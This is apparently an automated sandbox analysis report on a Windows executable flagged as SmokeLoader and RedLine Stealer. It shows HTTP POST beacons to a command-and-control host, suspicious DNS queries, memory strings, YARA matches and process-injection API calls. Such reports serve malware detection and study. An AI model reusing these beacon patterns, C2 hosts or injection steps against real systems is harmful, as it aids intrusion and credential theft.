Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pfdeyqiftydbxp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oxhmmntuaoqjqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jhatysyfpdjacrth.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ekrrlfpmfkagxhov.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mwurfcocxsehx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qjdqfxwyvfh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gwjmvpjprpa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hsokfaschfagb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yfwhugqkygknlega.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://clwlueiouwtdjlp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://komfkwumjafaljeh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gkcfyfujfvjeukc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dsuiipbvrtqiui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cottwgkexhqi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tyhclxkbrciiuit.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fdwyluiudrfobcvl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://shybhbwsshpkm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ejvcjodbems.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oilnmucjwyntrxl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: unicea.ws

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: tech-servers.in.net
Source: global traffic	DNS traffic detected: DNS query: unicea.ws

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phdqgddkvvudcrt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: unicea.ws

Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1745408529.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1744921630.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1746652711.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1748271457.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1748271457.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1743200606.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1745872183.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1745872183.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1748271457.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,	5_2_004032C7
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe

